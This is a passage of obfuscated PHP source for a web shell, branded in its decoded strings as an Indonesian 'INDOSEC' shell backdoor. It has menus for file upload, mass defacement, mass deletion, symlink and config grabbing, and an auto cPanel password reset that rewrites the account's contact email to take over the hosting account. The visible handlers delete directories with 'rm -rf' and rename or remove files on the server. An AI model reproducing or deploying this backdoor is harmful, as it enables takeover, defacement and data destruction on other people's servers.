"\x3c\160\x20\143\x6c\141\x73\163\75\47\x74\145\170\164\x2d\155\x75\164\145\144\x27\76\x4e\x42\40\x3a\x20\124\x6f\x6f\154\163\x20\151\156\x69\x20\x77\157\162\153\40\x6a\151\153\141\40\x64\x69\x6a\x61\x6c\141\156\153\x61\x6e\40\144\x69\x20\x64\x61\x6c\141\x6d\40\146\x6f\154\144\x65\162\x20\74\165\x3e\143\157\156\146\151\147\74\57\x75\76\x20\x28\x20\145\x78\72\40\57\x68\157\x6d\x65\x2f\165\x73\145\x72\57\160\165\x62\x6c\x69\143\137\x68\x74\x6d\154\x2f\x6e\x61\x6d\x61\146\157\x6c\x64\x65\162\137\143\157\x6e\146\x69\x67\x20\51\74\x2f\160\x3e"; $smtp = scj($path); die; } goto OKr2f; vGSQa: $free = disk_free_space($path); goto Dq2KF; WRL5A: $sof = $_SERVER["\x53\105\122\x56\105\122\137\123\117\106\x54\127\101\122\105"]; goto VHfhx; TncqD: if ($_GET["\141\153\163\x69"] == "\x72\x65\x6e\x61\155\x65\x5f\x66\157\154\144\x65\162") { $nama = basename(getcwd()); $output = "\xa\x9\x9\x9\133\40\x3c\x61\x20\x68\x72\145\146\75\47\x3f\144\x69\x72\75" . $dir . "\x26\141\x6b\x73\151\x3d\162\x65\x6e\141\155\x65\137\x66\157\154\x64\145\x72\47\x3e\x52\145\x6e\x61\x6d\145\x3c\57\141\76\40\135\40\40\133\40\74\141\40\x68\162\145\146\x3d\47\x3f\x64\151\x72\x3d" . $dir . "\x26\x61\153\x73\x69\75\150\141\x70\165\163\x5f\x66\x6f\x6c\x64\145\162\x27\x3e\x44\145\154\x65\164\145\x3c\x2f\x61\76\x20\x5d\x20\xa\x9\x9\11\x3c\150\64\76\x3c\151\155\x67\x20\163\x72\143\x3d\47\x68\x74\x74\160\72\x2f\57\x61\165\x78\x2e\x69\x63\157\156\163\160\141\154\x61\x63\145\x2e\x63\157\x6d\57\165\x70\154\x6f\141\144\163\x2f\x66\157\x6c\x64\x65\162\55\x69\143\x6f\156\x2d\62\65\x36\55\61\x37\70\67\66\67\x32\x34\70\x32\56\x70\x6e\147\47\40\x63\x6c\141\x73\163\x3d\47\x69\x63\x6f\47\x3e\x3c\57\x69\x6d\147\x3e\x20\x52\x65\x6e\x61\x6d\x65\40\106\157\x6c\x64\x65\162\40\x3a\40{$nama}\40\74\57\x68\x34\x3e\xa\11\x9\11\74\146\157\x72\155\x20\x6d\145\164\x68\x6f\144\75\47\120\117\123\x54\x27\x3e\12\11\x9\11\x9\x3c\151\x6e\160\165\x74\40\164\x79\160\145\75\47\x74\x65\170\164\x27\40\143\154\x61\x73\163\x3d\47\146\157\x72\155\x2d\143\157\156\x74\162\157\x6c\x27\40\x6e\141\155\x65\75\x27\x6e\x61\x6d\141\x6e\x65\167\47\40\141\165\x74\157\143\157\155\x70\x6c\x65\164\x65\x3d\x27\x6f\x66\x66\47\40\160\154\141\x63\x65\x68\x6f\x6c\144\145\x72\75\47\x4d\141\163\x75\153\x61\x6e\40\116\x61\x6d\x61\x20\x42\x61\x72\x75\56\x2e\56\x27\76\74\142\x72\x2f\76\xa\x9\x9\11\11\74\142\165\164\164\157\x6e\x20\x74\171\x70\145\x3d\47\163\x75\x6d\142\x69\x74\x27\x20\x63\154\x61\163\x73\x3d\47\x62\x74\x6e\x20\x62\x74\x6e\x2d\x69\x6e\146\x6f\40\142\164\156\55\142\154\157\143\153\47\40\x6e\141\155\145\x3d\x27\x67\x61\156\164\x69\47\x3e\x47\x61\x6e\x74\x69\x21\x21\x3c\57\142\165\x74\164\x6f\156\x3e\74\x62\162\x2f\x3e\xa\11\11\x9\74\x2f\x66\157\x72\155\x3e"; echo $output; if (isset($_POST["\x67\x61\x6e\164\x69"])) { $lama = $dir; $baru = $_POST["\x6e\x61\x6d\141\156\x65\167"]; $ubah = rename($lama, $baru); if ($ubah) { echo "\74\x73\x63\x72\151\160\x74\x3e\167\x69\x6e\x64\x6f\x77\56\154\157\143\141\164\151\x6f\x6e\75\47\x3f\x64\151\x72\75" . dirname($dir) . "\x27\x3b\x20\141\154\145\162\x74\x28\47\x42\145\162\x68\x61\x73\x69\x6c\x20\x4d\x65\x6e\147\147\x61\x6e\x74\151\x20\116\x61\155\x61\x27\x29\73\x3c\x2f\163\x63\162\x69\160\164\76"; } else { echo "\74\163\143\x72\151\160\x74\76\141\x6c\x65\x72\x74\50\47\x47\x61\x67\x61\154\40\115\x65\156\147\x67\x61\156\x74\151\40\116\x61\x6d\x61\x27\51\73\x3c\x2f\163\143\x72\x69\160\164\76"; } } die; } goto svX8T; yBPPy: if ($_GET["\141\153\x73\x69"] == "\162\x65\x6e\141\155\145") { $nama = basename($file); echo "\x5b\x20\74\141\x20\150\162\x65\x66\75\x22\77\144\151\x72\75" . $dir . "\46\x61\x6b\x73\151\x3d\166\151\145\x77\46\x66\x69\x6c\x65\x3d" . $file . "\x22\x3e\x4c\x69\150\141\x74\x3c\57\141\76\40\x5d\40\40\133\x20\x3c\x61\40\x68\x72\x65\x66\x3d\x22\x3f\144\x69\x72\x3d" . $dir . "\x26\x61\x6b\163\x69\x3d\x65\144\151\164\46\x66\151\154\x65\x3d" . $file . "\x22\76\x45\144\151\x74\x3c\57\141\x3e\40\x5d\40\x20\x5b\40\x3c\141\40\143\x6c\x61\163\x73\75\42\x61\143\x74\x69\x76\x65\x22\x20\x68\x72\x65\x66\x3d\x22\x3f\x64\151\x72\x3d" . $dir . "\x26\141\153\163\151\x3d\x72\x65\x6e\141\x6d\145\x26\146\x69\x6c\x65\x3d" . $file . "\x22\x3e\122\145\156\141\x6d\145\74\x2f\x61\76\40\135\40\40\133\40\x3c\141\x20\150\162\x65\146\x3d\42\x3f\x64\x69\162\75" . $dir . "\x26\141\x6b\163\151\x3d\x68\x61\160\165\x73\x66\x26\x66\x69\154\x65\x3d" . $file . "\42\76\x44\145\x6c\145\164\145\x3c\x2f\141\76\x20\135"; echo "\74\x66\157\162\155\x20\155\145\x74\150\157\x64\75\47\x50\117\123\x54\47\x3e\12\x9\11\11\x9\74\150\65\76\74\x69\x20\143\154\x61\x73\x73\x3d\x27\x66\141\40\x66\141\55\x66\x69\154\145\x27\x3e\x3c\57\x69\x3e\40\x52\145\156\141\155\145\x20\106\151\x6c\145\x20\x3a\x20{$nama}\x3c\x2f\x68\x35\x3e\xa\11\x9\x9\x9\74\x69\x6e\x70\x75\x74\40\x74\171\x70\145\x3d\47\164\145\x78\x74\47\40\143\x6c\141\163\163\75\x27\x66\157\x72\155\x2d\x63\x6f\x6e\x74\162\157\154\47\40\156\x61\155\x65\x3d\47\156\141\x6d\141\156\x65\x77\47\40\141\x75\x74\x6f\x63\157\155\160\x6c\145\164\145\75\47\157\146\x66\47\x20\x70\x6c\141\143\x65\150\x6f\x6c\x64\x65\162\x3d\x27\x4d\x61\163\165\153\141\x6e\x20\x4e\141\155\x61\x20\102\x61\162\x75\x2e\56\x2e\x27\x3e\74\142\162\x2f\76\xa\x9\x9\x9\11\x3c\142\165\164\x74\157\156\x20\164\x79\x70\x65\x3d\47\x73\165\155\x62\151\164\47\x20\143\x6c\141\x73\x73\75\47\142\x74\x6e\40\142\x74\156\x2d\x69\156\146\157\40\x62\164\x6e\x2d\x62\x6c\x6f\143\x6b\x27\x20\156\141\x6d\x65\x3d\47\x72\x65\156\141\155\x65\x5f\146\x69\154\x65\x27\x3e\x55\160\144\x61\164\145\74\57\142\x75\164\x74\x6f\x6e\x3e\12\x9\x9\x9\x3c\57\146\157\x72\155\x3e"; if (isset($_POST["\162\x65\x6e\141\x6d\x65\x5f\x66\151\x6c\145"])) { $lama = $file; $baru = $_POST["\x6e\141\155\141\x6e\x65\167"]; rename($baru, $lama); if (file_exists($baru)) { echo "\x3c\163\x63\162\151\160\x74\x3e\141\x6c\145\162\164\x28\42\116\141\155\141\x20" . $baru . "\40\124\145\x6c\x61\150\40\x44\151\147\165\x6e\x61\x6b\x61\x6e\42\51\x3b\x3c\57\x73\x63\x72\151\x70\x74\x3e"; } else { if (rename($lama, $baru)) { echo "\74\x73\143\162\151\160\164\x3e\x77\151\156\x64\x6f\167\x2e\154\x6f\143\x61\x74\x69\x6f\x6e\x3d\42\x3f\144\x69\x72\x3d" . $dir . "\x22\73\x20\141\x6c\145\162\164\x28\x22\123\165\x6b\163\x65\163\x20\x4d\x65\156\x67\x67\141\x6e\164\151\40\x4e\x61\x6d\141\40\x4d\x65\156\x6a\141\144\x69\40" . $baru . "\x22\x29\73\x3c\57\163\x63\x72\x69\x70\x74\x3e"; } else { echo "\74\x73\x63\x72\151\160\164\x3e\x61\x6c\145\x72\164\x28\42\x47\141\147\x61\154\x20\x4d\x65\x6e\x67\147\x61\156\164\151\40\116\x61\155\x61\42\x29\73\x3c\x2f\163\143\x72\x69\160\164\x3e"; } } } } goto XV3ue; fJEHo: if ($_GET["\141\x6b\163\151"] == "\150\x61\160\x75\x73\x5f\x66\x6f\x6c\x64\145\162") { $nama = basename(getcwd()); $output = "\xa\x9\x9\x9\133\40\74\141\40\x68\x72\145\x66\75\47\x3f\x64\x69\x72\75" . $dir . "\46\141\x6b\x73\151\x3d\162\x65\x6e\141\155\145\137\x66\157\x6c\144\x65\162\x27\x3e\x52\x65\156\141\x6d\145\x3c\x2f\x61\x3e\40\135\x20\x20\x5b\40\x3c\141\x20\x68\x72\x65\146\x3d\x27\x3f\x64\x69\x72\x3d" . $dir . "\46\141\153\163\151\x3d\x68\141\x70\x75\163\137\146\157\x6c\144\x65\x72\47\x3e\104\145\x6c\145\x74\x65\74\57\141\76\40\x5d\x20\xa\11\11\11\x3c\144\x69\166\x20\143\x6c\x61\163\163\x3d\47\143\141\162\144\40\143\141\x72\x64\55\x62\157\144\x79\x20\164\145\x78\x74\55\143\145\156\x74\x65\162\x27\x3e\xa\x9\x9\11\x9\74\146\x6f\156\x74\x20\143\157\154\157\162\x3d\x27\x62\x6c\141\143\x6b\47\76\x41\x70\141\x6b\x61\x68\x20\131\141\x6b\151\x6e\x20\x4d\145\x6e\147\150\141\x70\165\x73\40\x3a\x20{$nama}\40\77\74\x2f\146\x6f\x6e\164\x3e\xa\x9\x9\11\x9\x3c\146\x6f\x72\155\x20\155\x65\x74\150\x6f\x64\x3d\x27\x50\117\123\124\x27\76\xa\11\11\11\11\x9\74\141\40\x63\x6c\141\x73\x73\x3d\x27\142\164\156\x20\142\x74\156\x2d\x64\141\156\147\x65\162\x20\142\x74\x6e\x2d\x62\x6c\157\x63\153\x27\x20\150\x72\x65\146\x3d\x27\x3f\x64\x69\162\75" . dirname($dir) . "\x27\76\124\x69\x64\x61\153\74\x2f\141\x3e\12\11\x9\11\x9\x9\x3c\x69\x6e\x70\x75\x74\40\x74\171\x70\145\75\47\163\165\x62\155\x69\x74\47\40\156\x61\155\x65\75\47\x79\141\47\x20\143\154\141\163\x73\x3d\47\142\164\156\x20\x62\164\x6e\x2d\x73\x75\x63\x63\145\163\163\40\142\164\x6e\x2d\142\154\x6f\x63\153\x27\x20\166\x61\x6c\x75\x65\75\47\x59\141\47\x3e\xa\x9\11\11\11\x3c\57\146\x6f\x72\x6d\x3e\xa\x9\11\x9\74\x2f\144\x69\166\x3e\x3c\x62\x72\57\76"; echo $output; if ($_POST["\x79\141"]) { if (is_dir($dir)) { if (is_writable($dir)) { @rmdir($dir); @exe("\x72\x6d\40\55\x72\x66\40{$dir}"); @exe("\162\x6d\144\151\162\x20\57\163\x20\x2f\161\40{$dir}"); echo "\x3c\163\x63\x72\x69\x70\x74\76\x77\x69\156\144\x6f\167\x2e\x6c\157\x63\141\164\x69\157\156\75\x27\77\x64\x69\162\x3d" . dirname($dir) . "\x27\x3b\x20\141\154\x65\x72\x74\50\47\102\145\162\x68\x61\163\151\x6c\40\x4d\145\156\147\150\x61\x70\165\x73\40" . $nama . "\47\51\x3b\74\57\163\143\x72\x69\x70\x74\76"; } else { echo "\x3c\x73\143\162\151\x70\x74\x3e\x77\x69\156\x64\157\x77\x2e\x6c\157\x63\141\164\151\157\x6e\75\x27\x3f\144\x69\162\75" . dirname($dir) . "\x27\x3b\x20\141\154\145\x72\x74\50\x27\124\x69\144\x61\x6b\x20\104\x61\x70\x61\x74\40\115\145\156\147\150\141\x70\165\163\40" . $nama . "\x27\x29\73\x3c\57\x73\143\162\151\160\164\76"; } } } die; } goto TncqD; DE8WR: echo "\x3c\x64\151\x76\x20\x69\x64\x3d\x22\x74\x61\x62\42\76\x3c\x74\141\x62\154\x65\x20\143\x6c\x61\x73\x73\x3d\x22\x74\145\x78\x74\55\167\x68\x69\x74\145\40\x6d\164\55\61\x20\x74\x61\x62\x6c\145\55\150\157\x76\x65\162\40\164\x61\142\x6c\145\x2d\162\145\163\160\157\156\163\151\166\145\42\x3e\xa\11\x9\11\74\x74\150\145\x61\144\40\143\x6c\x61\x73\163\x3d\x22\x62\147\x2d\151\156\146\157\x20\x74\145\170\164\55\143\145\x6e\164\x65\162\42\76\xa\x9\11\x9\11\74\x74\150\40\143\x6c\x61\x73\x73\x3d\42\x74\x65\x78\x74\55\x6c\145\x66\164\x22\76\x46\151\x6c\x65\57\106\157\x6c\x64\145\162\74\57\x74\x68\76\12\11\x9\x9\11\x3c\x74\x68\76\x53\151\172\145\74\x2f\x74\x68\76\xa\11\x9\11\x9\74\x74\x68\76\120\x65\x72\155\151\x73\163\151\157\156\x3c\57\x74\x68\x3e\12\11\11\11\x9\x3c\164\150\x3e\101\x63\x74\151\157\x6e\x3c\x2f\164\150\x3e\xa\11\11\11\x3c\57\164\150\x65\141\x64\x3e"; goto xn6PP; kOh3B: if ($_GET["\141\x6b\x73\151"] == "\162\145\163\x65\164\160\141\x73\163\x63\x70") { echo "\74\x68\x35\40\143\154\x61\163\163\75\42\x74\145\170\x74\55\143\x65\x6e\x74\145\x72\42\76\74\151\40\x63\154\141\163\163\75\42\146\141\40\x66\141\55\x6b\145\171\42\76\x3c\x2f\x69\x3e\40\x41\x75\164\x6f\40\x52\x65\163\145\164\40\x50\x61\163\163\x77\157\x72\x64\x20\x43\x70\x61\x6e\145\x6c\x3c\57\150\x35\76\xa\x9\11\74\146\157\x72\155\x20\155\x65\164\150\157\144\x3d\42\x50\x4f\123\x54\x22\x3e\12\x9\11\11\x3c\x64\x69\166\x20\x63\x6c\x61\163\163\75\x22\146\x6f\162\x6d\55\147\162\x6f\165\x70\42\76\xa\x9\x9\11\x9\x3c\x69\x6e\160\165\x74\40\x74\x79\x70\145\75\x22\145\x6d\141\x69\154\x22\40\156\x61\x6d\145\x3d\x22\145\155\x61\x69\154\x22\40\x63\154\141\x73\x73\x3d\42\x66\x6f\x72\x6d\55\143\157\156\164\x72\x6f\154\42\x20\x70\x6c\141\x63\x65\x68\157\x6c\144\x65\162\75\x22\115\x61\163\165\153\x61\156\40\x45\155\x61\x69\x6c\x2e\x2e\x2e\x22\57\x3e\x3c\x62\162\57\x3e\12\11\11\11\x9\x3c\151\x6e\x70\x75\x74\x20\x74\x79\x70\145\x3d\x22\x73\165\x62\155\151\164\42\40\x6e\x61\155\145\x3d\x22\x73\x75\142\x6d\151\164\x22\40\x63\154\x61\x73\163\75\42\142\x74\x6e\40\x62\164\156\55\x64\x61\156\147\x65\x72\40\142\164\156\x2d\142\154\157\143\x6b\x22\40\x76\141\x6c\x75\x65\x3d\42\x53\x65\156\144\x22\x2f\76\xa\11\x9\x9\74\57\144\x69\x76\76\xa\11\x9\74\57\x66\x6f\x72\155\x3e"; if (isset($_POST["\163\x75\x62\155\x69\x74"])) { $user = get_current_user(); $site = $_SERVER["\x48\x54\x54\120\x5f\110\x4f\123\124"]; $ips = getenv("\122\105\115\x4f\124\105\x5f\x41\x44\104\x52"); $email = $_POST["\145\155\x61\151\154"]; $wr = "\145\155\x61\151\154\x3a" . $email; $f = fopen("\57\150\157\x6d\x65\x2f" . $user . "\x2f\x2e\x63\x70\x61\x6e\145\x6c\57\143\157\156\164\x61\x63\x74\x69\x6e\146\157", "\167"); fwrite($f, $wr); fclose($f); $f = fopen("\x2f\x68\x6f\155\x65\57" . $user . "\57\x2e\x63\157\x6e\x74\x61\143\x74\x69\x6e\146\x6f", "\167"); fwrite($f, $wr); fclose($f); $parm = $site . "\x3a\62\x30\70\x32\57\x72\145\163\x65\x74\160\x61\163\x73\77\x73\164\x61\x72\164\75\61"; echo "\74\142\x72\57\x3e\125\162\x6c\x3a\x20" . $parm . ''; echo "\x3c\x62\162\57\x3e\x55\163\145\x72\x6e\141\x6d\145\72\x20" . $user . ''; echo "\74\x62\x72\x2f\76\123\165\x63\143\x65\x73\x73\x20\x52\145\x73\x65\164\40\x54\157\72\40" . $email . "\74\142\162\x2f\x3e\x3c\142\162\57\x3e"; } die; } goto VpdbN; VHfhx: $dir = str_replace("\x5c", "\x2f", $dir); goto xEaUB; svX8T: if ($_GET["\141\x6b\163\x69"] == "\x6d\141\x73\144\145\154") { function hapus_massal($dir, $namafile) { if (is_writable($dir)) { $dira = scandir($dir); foreach ($dira as $dirb) { $dirc = "{$dir}\x2f{$dirb}"; $lokasi = $dirc . "\57" . $namafile; if ($dirb === "\56") { if (file_exists("{$dir}\57{$namafile}")) { unlink("{$dir}\57{$namafile}"); } } elseif ($dirb === "\56\x2e") { if (file_exists('' . dirname($dir) . "\57{$namafile}")) { unlink('' . dirname($dir) . "\57{$namafile}"); } } else { if (is_dir($dirc)) { if (is_writable($dirc)) { if ($lokasi) { echo "{$lokasi}\40\x3e\x20\x54\x65\162\x68\141\x70\165\163\xa"; unlink($lokasi); $massdel = hapus_massal($dirc, $namafile); } } } } } } } if ($_POST["\x73\164\x61\x72\164"]) { echo "\x5b\x20\x3c\141\x20\x68\x72\x65\x66\x3d\x27\x3f\x64\x69\162\x3d{$dir}\47\76\113\x65\x6d\142\x61\154\151\x3c\x2f\141\76\x20\x5d\12\11\11\11\11\x3c\x74\145\x78\x74\x61\162\145\141\40\143\x6c\141\163\163\x3d\x27\146\x6f\x72\x6d\55\x63\x6f\x6e\164\x72\x6f\154\47\40\x72\157\x77\163\75\x27\67\x27\x20\x64\x69\163\141\x62\x6c\145\144\x3d\47\47\76"; hapus_massal($_POST["\144\137\x64\151\162"], $_POST["\x64\137\x66\151\x6c\x65"]); echo "\74\57\164\145\170\164\141\x72\145\141\x3e\x3c\x62\162\x2f\x3e"; } else { echo "\74\146\157\162\x6d\x20\155\x65\x74\x68\157\144\x3d\x27\x70\x6f\163\164\x27\x3e\xa\x9\x9\x9\x9\x9\x3c\150\x35\76\x3c\151\x20\x63\x6c\x61\x73\x73\75\x27\x66\141\x20\x66\141\x2d\x66\157\154\144\x65\x72\47\76\74\x2f\151\76\40\x4c\x6f\153\141\x73\151\x20\72\74\x2f\x68\65\x3e\xa\x9\11\x9\11\x9\74\x69\156\160\165\x74\x20\x74\x79\160\145\x3d\47\x74\145\170\164\x27\x20\156\x61\x6d\145\x3d\x27\144\x5f\144\151\162\x27\40\166\141\x6c\165\145\75\47{$dir}\x27\x20\x63\154\141\163\163\75\x27\x66\x6f\162\x6d\55\x63\x6f\x6e\164\162\157\154\47\76\74\142\x72\x3e\xa\11\11\11\11\11\x3c\150\x35\x3e\x3c\x69\x20\x63\154\x61\163\x73\40\x3d\x27\x66\141\x20\146\x61\x2d\146\x69\154\145\x27\x3e\x3c\57\x69\x3e\40\116\x61\155\x61\40\x46\x69\154\x65\x20\72\x3c\57\150\65\x3e\12\x9\x9\11\11\11\74\151\156\160\x75\x74\40\164\171\x70\x65\x3d\x27\x74\x65\x78\164\x27\x20\156\141\155\145\x3d\47\x64\x5f\x66\x69\154\145\47\40\x61\x75\x74\x6f\x63\157\x6d\x70\154\x65\x74\145\x3d\x27\157\146\146\x27\x20\160\x6c\141\143\145\150\x6f\154\x64\x65\x72\75\47\x5b\105\170\135\x20\151\156\x64\145\x78\x2e\160\150\160\47\40\x63\154\x61\163\x73\x3d\47\x66\x6f\162\155\x2d\x63\157\156\164\x72\157\154\x27\76\74\x62\x72\76\xa\11\x9\x9\x9\x9\x3c\151\x6e\160\165\164\40\164\171\160\x65\x3d\47\163\x75\142\x6d\x69\164\47\40\156\x61\x6d\x65\x3d\47\163\x74\141\162\x74\x27\40\166\x61\x6c\165\x65\75\47\104\145\x6c\x65\164\145\41\x21\x27\x20\143\154\x61\163\163\75\x27\x62\x74\x6e\40\142\164\x6e\x2d\144\141\x6e\147\x65\x72\40\x66\157\162\x6d\x2d\143\157\156\x74\x72\x6f\154\47\76\12\x9\x9\x9\74\57\x66\x6f\x72\x6d\x3e"; } die; } goto Ednnu; zsyBf: echo "\xa\x9\x9\74\x64\x69\166\x20\x63\x6c\141\163\x73\75\42\143\157\156\164\141\x69\156\x65\x72\42\x3e\xa\x9\x9\x9\74\150\61\x20\143\x6c\141\163\x73\75\42\x74\145\170\x74\55\x63\x65\x6e\164\145\x72\x22\x3e\74\141\40\x68\x72\145\x66\x3d\42\x68\x74\164\160\163\x3a\57\x2f\146\141\143\x65\x62\x6f\157\x6b\56\x63\157\155\57\111\x6e\x64\157\123\x65\x63\117\146\x66\151\x63\x69\141\154\42\40\163\x74\x79\154\145\x3d\x22\x63\157\x6c\x6f\x72\x3a\x23\x66\x66\x66\146\x66\146\x3b\x22\x3e\x7b\x20\111\116\x44\117\x53\105\x43\40\x7d\x3c\57\x68\x31\76\xa\11\x9\x9\x3c\x63\145\x6e\x74\145\162\x3e\74\150\65\76\123\x68\145\x6c\154\40\x42\141\143\153\144\157\157\162\74\57\141\76\74\57\x68\x35\76\74\57\x63\145\x6e\x74\x65\x72\x3e\12\x9\11\x9\74\x68\x72\x2f\76\xa\x9\x9\11\74\144\x69\166\40\143\x6c\x61\163\163\x3d\x22\x74\x65\x78\164\x2d\x63\x65\156\164\x65\162\42\76\xa\11\11\11\11\74\x64\x69\166\x20\x63\x6c\141\x73\163\x3d\x22\x64\x2d\146\154\x65\170\x20\x6a\165\x73\x74\151\146\x79\x2d\143\157\156\164\x65\156\164\55\x63\x65\x6e\164\145\162\x20\x66\x6c\x65\x78\x2d\x77\162\x61\x70\42\76\xa\11\11\11\x9\11\x3c\141\40\150\162\x65\146\75\42\x3f\x22\x20\143\x6c\x61\163\x73\x3d\42\x66\x69\164\165\x72\145\40\142\x74\156\40\x62\x74\x6e\x2d\x64\x61\156\147\145\162\40\142\x74\156\55\163\155\42\76\74\x69\x20\x63\x6c\141\163\163\x3d\x22\x66\141\x20\146\x61\x2d\150\x6f\x6d\145\42\x3e\x3c\57\x69\76\40\x48\x6f\x6d\145\74\57\141\76\12\11\11\11\x9\11\x3c\141\40\150\162\x65\x66\x3d\x22\x3f\x64\151\x72\75" . $dir . "\x26\141\153\163\x69\75\165\160\154\x6f\141\144\42\40\x63\154\141\x73\163\75\x22\146\151\x74\x75\x72\145\x20\x62\x74\156\40\142\164\x6e\55\x64\141\156\147\x65\x72\40\142\164\x6e\55\x73\155\42\76\x3c\151\40\x63\154\x61\x73\x73\75\x22\x66\x61\x20\x66\x61\x2d\x75\x70\x6c\x6f\x61\144\x22\x3e\x3c\57\x69\76\40\x55\160\154\157\141\144\74\x2f\141\x3e\xa\11\x9\x9\x9\11\74\141\40\150\x72\x65\146\x3d\42\x3f\144\x69\162\75" . $dir . "\46\x61\153\163\151\x3d\x62\x75\x61\x74\137\x66\151\154\145\42\40\x63\154\141\163\x73\75\x22\x66\x69\164\x75\162\145\40\x62\x74\156\40\142\x74\x6e\x2d\144\x61\156\147\145\162\40\x62\x74\x6e\x2d\163\x6d\42\x3e\x3c\151\40\x63\154\141\x73\x73\x3d\42\146\x61\40\146\141\55\x70\154\165\x73\55\x63\x69\x72\x63\x6c\145\42\76\74\57\151\76\40\102\x75\x61\x74\40\x46\151\154\145\x3c\x2f\141\x3e\xa\x9\x9\x9\x9\11\74\141\40\x68\162\145\x66\75\x22\77\144\151\x72\x3d" . $dir . "\46\x61\x6b\163\151\75\x62\165\141\164\x5f\x66\157\x6c\144\x65\162\x22\x20\143\x6c\141\163\163\75\42\x66\151\164\165\162\145\40\142\x74\x6e\40\x62\164\156\x2d\x64\141\156\x67\145\x72\x20\142\x74\156\x2d\163\155\42\x3e\74\151\x20\x63\x6c\141\x73\163\x3d\x22\x66\141\x20\146\141\x2d\x70\154\165\x73\42\76\x3c\x2f\151\x3e\x20\102\165\141\x74\x20\106\x6f\154\144\x65\162\x3c\57\141\76\12\x9\x9\x9\11\11\x3c\141\x20\x68\x72\x65\146\75\42\77\x64\151\x72\75" . $dir . "\46\141\153\163\x69\x3d\x6d\141\163\144\145\146\x22\40\143\154\141\163\163\75\x22\x66\151\x74\x75\x72\x65\40\142\164\x6e\40\x62\164\x6e\x2d\x64\x61\x6e\147\x65\162\x20\x62\x74\156\55\163\155\x22\76\74\151\40\x63\154\x61\x73\x73\x3d\x22\x66\141\40\146\x61\x2d\x65\170\x63\154\141\155\x61\164\151\x6f\x6e\55\x74\162\151\x61\x6e\x67\x6c\x65\42\x3e\74\57\x69\76\x20\115\141\x73\x73\40\104\145\x66\x61\x63\145\74\x2f\x61\76\12\x9\11\x9\x9\11\x3c\x61\40\x68\x72\145\x66\75\x22\x3f\144\151\162\75" . $dir . "\x26\x61\153\x73\x69\75\x6d\x61\163\x64\145\x6c\x22\x20\x63\154\x61\163\x73\x3d\42\x66\151\164\165\162\145\40\x62\164\156\40\x62\164\156\x2d\x64\x61\x6e\x67\x65\162\40\142\164\156\x2d\163\155\42\76\74\151\x20\143\154\141\x73\163\75\x22\146\x61\x20\x66\141\55\164\162\141\163\150\42\x3e\74\57\x69\76\x20\115\x61\x73\x73\x20\104\145\154\145\164\x65\74\x2f\141\76\12\11\x9\11\x9\x9\74\x61\40\x68\x72\x65\146\75\42\77\144\x69\x72\75" . $dir . "\46\x61\x6b\163\151\x3d\x6a\x75\155\160\x69\x6e\147\x22\x20\143\x6c\141\x73\x73\75\42\x66\151\x74\165\162\x65\40\142\x74\x6e\x20\x62\164\x6e\55\x64\141\x6e\147\x65\x72\x20\142\x74\156\55\x73\155\42\x3e\74\151\x20\143\154\141\163\163\x3d\42\146\x61\x20\146\x61\x2d\145\x78\143\154\x61\x6d\x61\x74\151\157\156\55\x74\x72\151\x61\156\147\x6c\145\x22\76\x3c\x2f\x69\x3e\x20\112\x75\155\160\x69\x6e\147\x3c\57\x61\76\xa\x9\x9\11\11\x9\x3c\141\x20\150\162\x65\x66\75\x22\x3f\x64\x69\x72\75" . $dir . "\46\141\x6b\163\x69\75\x63\x6f\156\x66\151\147\x22\40\143\154\x61\x73\163\75\x22\x66\x69\164\165\162\x65\40\142\164\x6e\x20\x62\x74\156\55\144\141\156\147\145\x72\x20\142\164\x6e\55\163\x6d\42\x3e\x3c\x69\x20\x63\154\141\x73\163\x3d\x22\146\141\40\x66\x61\55\143\x6f\x67\x73\42\x3e\74\57\151\76\x20\103\157\156\x66\151\x67\x3c\x2f\x61\76\xa\11\11\11\11\x9\x3c\x61\40\150\x72\145\x66\x3d\x22\x3f\x64\x69\162\x3d" . $dir . "\46\x61\x6b\163\151\75\x61\144\155\x69\x6e\x65\x72\42\40\x63\154\x61\x73\x73\x3d\42\146\x69\x74\165\162\145\x20\142\x74\x6e\x20\x62\164\156\x2d\x64\x61\x6e\147\x65\162\40\x62\164\156\55\163\155\42\76\74\x69\40\x63\x6c\141\x73\163\75\42\x66\141\40\x66\x61\55\x75\x73\145\162\42\x3e\x3c\57\x69\76\x20\101\144\155\x69\x6e\x65\162\x3c\x2f\141\76\12\11\11\11\x9\x9\x3c\141\x20\150\x72\145\x66\75\x22\x3f\144\151\162\75" . $dir . "\46\141\x6b\163\x69\x3d\x73\x79\x6d\x6c\151\x6e\153\42\x20\143\154\141\x73\163\x3d\x22\x66\151\x74\165\x72\x65\x20\142\164\x6e\x20\x62\x74\x6e\x2d\144\x61\x6e\147\145\162\40\142\x74\x6e\x2d\x73\x6d\42\x3e\74\x69\x20\143\154\141\x73\x73\x3d\42\146\141\x20\x66\141\55\145\170\143\x6c\141\x6d\x61\x74\151\x6f\x6e\x2d\x63\x69\x72\143\x6c\x65\42\x3e\74\x2f\151\x3e\40\123\x79\x6d\x6c\151\x6e\x6b\74\x2f\x61\x3e\xa\11\x9\11\x9\11\74\x61\40\x68\162\x65\x66\x3d\x22\77\144\x69\162\75" . $dir . "\46\141\153\163\151\x3d\x72\x65\163\145\x74\x70\x61\163\163\143\x70\42\40\x63\154\141\x73\x73\75\x22\x66\x69\164\165\x72\x65\x20\142\164\x6e\x20\142\164\x6e\55\167\x61\162\x6e\151\156\147\x20\x62\164\156\55\163\x6d\x22\76\x3c\151\40\x63\x6c\x61\163\163\75\x22\x66\x61\x20\x66\x61\x2d\153\x65\171\x22\x3e\x3c\x2f\x69\76\x20\x41\165\x74\x6f\x20\x52\145\x73\145\164\40\103\160\141\156\x65\x6c\x3c\x2f\x61\x3e\xa\x9\x9\11\x9\11\74\x61\40\150\x72\x65\146\x3d\42\x3f\x64\151\x72\75" . $dir . "\46\141\153\x73\x69\75\x61\x75\164\145\144\x75\163\x65\162\42\x20\x63\x6c\x61\x73\163\75\x22\146\x69\x74\165\162\145\x20\142\164\156\40\x62\x74\x6e\55\167\141\x72\x6e\x69\156\147\40\142\x74\x6e\x2d\163\155\x22\x3e\74\151\x20\143\154\x61\163\163\x3d\x22\146\141\x73\40\x66\x61\55\165\163\x65\x72\x2d\145\144\151\x74\42\76\74\x2f\x69\x3e\40\x41\x75\164\157\x20\x45\x64\x69\x74\40\x55\163\145\162\74\57\x61\76\xa\x9\x9\11\11\x9\x3c\x61\x20\150\x72\145\x66\75\42\77\x64\151\162\x3d" . $dir . 